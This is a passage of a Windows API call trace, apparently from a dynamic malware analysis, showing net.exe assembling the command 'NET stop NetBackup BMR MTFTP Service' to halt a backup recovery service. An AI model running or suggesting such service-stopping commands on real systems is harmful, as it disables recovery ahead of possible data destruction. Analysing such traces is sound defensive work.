_String2="NetBackup") returned 5 [0100.307] _wcsicmp (_String1="SESS", _String2="BMR") returned 17 [0100.307] _wcsicmp (_String1="SESS", _String2="MTFTP") returned 6 [0100.308] _wcsicmp (_String1="SESS", _String2="Service") returned 1 [0100.308] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0100.308] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0100.308] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0100.308] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0100.308] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0100.308] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0100.308] _wcsicmp (_String1="STATS", _String2="NetBackup") returned 5 [0100.308] _wcsicmp (_String1="STATS", _String2="BMR") returned 17 [0100.308] _wcsicmp (_String1="STATS", _String2="MTFTP") returned 6 [0100.308] _wcsicmp (_String1="STATS", _String2="Service") returned 15 [0100.308] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0100.308] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0100.308] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0100.308] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0100.308] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0100.308] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0100.308] _wcsicmp (_String1="USERS", _String2="NetBackup") returned 7 [0100.308] _wcsicmp (_String1="USERS", _String2="BMR") returned 19 [0100.308] _wcsicmp (_String1="USERS", _String2="MTFTP") returned 8 [0100.308] _wcsicmp (_String1="USERS", _String2="Service") returned 2 [0100.308] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0100.308] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0100.308] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0100.309] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0100.309] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0100.309] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0100.309] _wcsicmp (_String1="REDIRECTOR", _String2="NetBackup") returned 4 [0100.309] _wcsicmp (_String1="REDIRECTOR", _String2="BMR") returned 16 [0100.309] _wcsicmp (_String1="REDIRECTOR", _String2="MTFTP") returned 5 [0100.309] _wcsicmp (_String1="REDIRECTOR", _String2="Service") returned -1 [0100.309] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0100.309] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0100.309] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0100.309] _wcsicmp (_String1="REDIR", _String2="NetBackup") returned 4 [0100.309] _wcsicmp (_String1="REDIR", _String2="BMR") returned 16 [0100.309] _wcsicmp (_String1="REDIR", _String2="MTFTP") returned 5 [0100.309] _wcsicmp (_String1="REDIR", _String2="Service") returned -1 [0100.309] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0100.309] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0100.309] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0100.309] _wcsicmp (_String1="RDR", _String2="NetBackup") returned 4 [0100.309] _wcsicmp (_String1="RDR", _String2="BMR") returned 16 [0100.309] _wcsicmp (_String1="RDR", _String2="MTFTP") returned 5 [0100.309] _wcsicmp (_String1="RDR", _String2="Service") returned -1 [0100.309] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0100.309] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0100.309] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0100.309] _wcsicmp (_String1="WORK", _String2="NetBackup") returned 9 [0100.309] _wcsicmp (_String1="WORK", _String2="BMR") returned 21 [0100.309] _wcsicmp (_String1="WORK", _String2="MTFTP") returned 10 [0100.310] _wcsicmp (_String1="WORK", _String2="Service") returned 4 [0100.310] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0100.310] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0100.310] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0100.310] _wcsicmp (_String1="WKSTA", _String2="NetBackup") returned 9 [0100.310] _wcsicmp (_String1="WKSTA", _String2="BMR") returned 21 [0100.310] _wcsicmp (_String1="WKSTA", _String2="MTFTP") returned 10 [0100.310] _wcsicmp (_String1="WKSTA", _String2="Service") returned 4 [0100.310] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0100.310] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0100.310] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0100.310] _wcsicmp (_String1="PRDR", _String2="NetBackup") returned 2 [0100.310] _wcsicmp (_String1="PRDR", _String2="BMR") returned 14 [0100.310] _wcsicmp (_String1="PRDR", _String2="MTFTP") returned 3 [0100.310] _wcsicmp (_String1="PRDR", _String2="Service") returned -3 [0100.310] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0100.310] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0100.310] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0100.310] _wcsicmp (_String1="DEVRDR", _String2="NetBackup") returned -10 [0100.310] _wcsicmp (_String1="DEVRDR", _String2="BMR") returned 2 [0100.310] _wcsicmp (_String1="DEVRDR", _String2="MTFTP") returned -9 [0100.310] _wcsicmp (_String1="DEVRDR", _String2="Service") returned -15 [0100.310] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0100.310] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0100.311] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0100.311] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0100.311] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0100.311] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0100.311] _wcsicmp (_String1="SVR", _String2="NetBackup") returned 5 [0100.311] _wcsicmp (_String1="SVR", _String2="BMR") returned 17 [0100.311] _wcsicmp (_String1="SVR", _String2="MTFTP") returned 6 [0100.311] _wcsicmp (_String1="SVR", _String2="Service") returned 17 [0100.311] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0100.311] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0100.311] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0100.311] _wcsicmp (_String1="SRV", _String2="NetBackup") returned 5 [0100.311] _wcsicmp (_String1="SRV", _String2="BMR") returned 17 [0100.311] _wcsicmp (_String1="SRV", _String2="MTFTP") returned 6 [0100.311] _wcsicmp (_String1="SRV", _String2="Service") returned 13 [0100.311] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0100.311] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x14f8b8, nSize=0x0, Arguments=0x14f8b4 | out: lpBuffer="哈Xꔺ盹") returned 0x1c [0100.311] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0100.311] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0100.311] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0100.311] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0100.311] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0100.311] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0100.312] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0100.312] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0100.312] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0100.312] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0100.312] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0100.312] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0100.312] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0100.313] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0100.314] GetFileType (hFile=0x0) returned 0x0 [0100.314] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x583ab8 [0100.314] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x583ab8, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0100.314] WriteFile (in: hFile=0x0, lpBuffer=0x583ab8, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14f898, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f898, lpOverlapped=0x0) returned 0 [0100.314] LocalFree (hMem=0x583ab8) returned 0x0 [0100.314] GetFileType (hFile=0x0) returned 0x0 [0100.314] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5837b8 [0100.314] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5837b8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nX", lpUsedDefaultChar=0x0) returned 2 [0100.314] WriteFile (in: hFile=0x0, lpBuffer=0x5837b8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x14f898, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f898, lpOverlapped=0x0) returned 0 [0100.314] LocalFree (hMem=0x5837b8) returned 0x0 [0100.314] wcscpy_s (in: _Destination=0x14f950, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0100.315] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0100.315] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0100.315] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0100.315] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="NetBackup", _MaxCount=0xffffffff | out: _Destination="NET stop NetBackup") returned 0x0 [0100.315] wcsncat_s (in: _Destination="NET stop NetBackup", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop NetBackup ") returned 0x0 [0100.315] wcsncat_s (in: _Destination="NET stop NetBackup ", _SizeInWords=0x200, _Source="BMR", _MaxCount=0xffffffff | out: _Destination="NET stop NetBackup BMR") returned 0x0 [0100.315] wcsncat_s (in: _Destination="NET stop NetBackup BMR", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop NetBackup BMR ") returned 0x0 [0100.315] wcsncat_s (in: _Destination="NET stop NetBackup BMR ", _SizeInWords=0x200, _Source="MTFTP", _MaxCount=0xffffffff | out: _Destination="NET stop NetBackup BMR MTFTP") returned 0x0 [0100.315] wcsncat_s (in: _Destination="NET stop NetBackup BMR MTFTP", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop NetBackup BMR MTFTP ") returned 0x0 [0100.315] wcsncat_s (in: _Destination="NET stop NetBackup BMR MTFTP ", _SizeInWords=0x200, _Source="Service", _MaxCount=0xffffffff | out: _Destination="NET stop NetBackup BMR MTFTP Service") returned 0x0 [0100.315] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X댸?\x14Ѱ?") returned 0xad [0100.315] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes", _MaxCount=0x24) returned 18 [0100.315] LocalFree (hMem=0x585510) returned 0x0 [0100.315] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x2e [0100.315] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET COMPUTER\r\n\\\\computername {/ADD |", _MaxCount=0x24) returned 16 [0100.315] LocalFree (hMem=0x585510) returned 0x0 [0100.315] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x7d [0100.315] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:", _MaxCount=0x24) returned 16 [0100.315] LocalFree (hMem=0x585510) returned 0x0 [0100.315] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x26 [0100.315] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n", _MaxCount=0x24) returned 16 [0100.316] LocalFree (hMem=0x585510) returned 0x0 [0100.316] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x19 [0100.316] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x24) returned 16 [0100.316] LocalFree (hMem=0x585510) returned 0x0 [0100.316] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x1b [0100.316] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x24) returned 13 [0100.316] LocalFree (hMem=0x585510) returned 0x0 [0100.316] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0xbe [0100.316] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET GROUP\r\n[groupname [/COMMENT:\"tex", _MaxCount=0x24) returned 12 [0100.316] LocalFree (hMem=0x585510) returned 0x0 [0100.316] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x33 [0100.316] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET co", _MaxCount=0x24) returned 11 [0100.316] LocalFree (hMem=0x585510) returned 0x0 [0100.316] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x19 [0100.316] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x24) returned 11 [0100.316] LocalFree (hMem=0x585510) returned 0x0 [0100.316] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0xc1 [0100.316] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT", _MaxCount=0x24) returned 7 [0100.316] LocalFree (hMem=0x585510) returned 0x0 [0100.316] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x16 [0100.317] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x24) returned 3 [0100.317] LocalFree (hMem=0x585510) returned 0x0 [0100.317] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x33 [0100.317] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET SESSION\r\n[\\\\computername] [/DELE", _MaxCount=0x24) returned 15 [0100.317] LocalFree (hMem=0x585510) returned 0x0 [0100.317] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x234 [0100.317] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET SHARE\r\nsharename\r\n shar", _MaxCount=0x24) returned 12 [0100.318] LocalFree (hMem=0x585510) returned 0x0 [0100.318] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x13 [0100.318] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START BROWSER\r\n", _MaxCount=0x24) returned 14 [0100.318] LocalFree (hMem=0x585510) returned 0x0 [0100.318] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x14 [0100.318] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x24) returned 14 [0100.318] LocalFree (hMem=0x585510) returned 0x0 [0100.318] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x14 [0100.318] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START EVENTLOG\r\n", _MaxCount=0x24) returned 14 [0100.318] LocalFree (hMem=0x585510) returned 0x0 [0100.318] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x15 [0100.318] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START MESSENGER\r\n", _MaxCount=0x24) returned 14 [0100.318] LocalFree (hMem=0x585510) returned 0x0 [0100.318] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x15 [0100.318] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START NET LOGON\r\n", _MaxCount=0x24) returned 14 [0100.318] LocalFree (hMem=0x585510) returned 0x0 [0100.318] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x16 [0100.318] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x24) returned 14 [0100.318] LocalFree (hMem=0x585510) returned 0x0 [0100.318] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x11 [0100.318] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START RPCSS\r\n", _MaxCount=0x24) returned 14 [0100.318] LocalFree (hMem=0x585510) returned 0x0 [0100.318] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x14 [0100.318] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START SCHEDULE\r\n", _MaxCount=0x24) returned 14 [0100.318] LocalFree (hMem=0x585510) returned 0x0 [0100.318] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x12 [0100.319] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START SERVER\r\n", _MaxCount=0x24) returned 14 [0100.319] LocalFree (hMem=0x585510) returned 0x0 [0100.319] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0xf [0100.319] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START UPS\r\n", _MaxCount=0x24) returned 14 [0100.319] LocalFree (hMem=0x585510) returned 0x0 [0100.319] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x17 [0100.319] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START WORKSTATION\r\n", _MaxCount=0x24) returned 14 [0100.319] LocalFree (hMem=0x585510) returned 0x0 [0100.319] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x18 [0100.319] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x24) returned 14 [0100.319] LocalFree (hMem=0x585510) returned 0x0 [0100.319] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x2a [0100.319] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET STATISTICS\r\n[WORKSTATION | SERVE", _MaxCount=0x24) returned 14 [0100.319] LocalFree (hMem=0x585510) returned 0x0 [0100.319] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x15 [0100.319] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x24) returned 19 [0100.319] LocalFree (hMem=0x585510) returned 0x0 [0100.319] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x58 [0100.319] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAI", _MaxCount=0x24) returned -1 [0100.319] LocalFree (hMem=0x585510) returned 0x0 [0100.319] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x184 [0100.319] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET USE\r\n[devicename | *] [\\\\compute", _MaxCount=0x24) returned -2 [0100.319] LocalFree (hMem=0x585510) returned 0x0 [0100.319] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0xc7 [0100.320] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET USER\r\n[username [password | *] [", _MaxCount=0x24) returned -2 [0100.320] LocalFree (hMem=0x585510) returned 0x0 [0100.320] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x47 [0100.320] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET VIEW\r\n[\\\\computername [/CACHE] |", _MaxCount=0x24) returned -3 [0100.320] LocalFree (hMem=0x585510) returned 0x0 [0100.320] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0xc2 [0100.320] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CON", _MaxCount=0x24) returned 19 [0100.320] LocalFree (hMem=0x585510) returned 0x0 [0100.320] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x319 [0100.320] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", 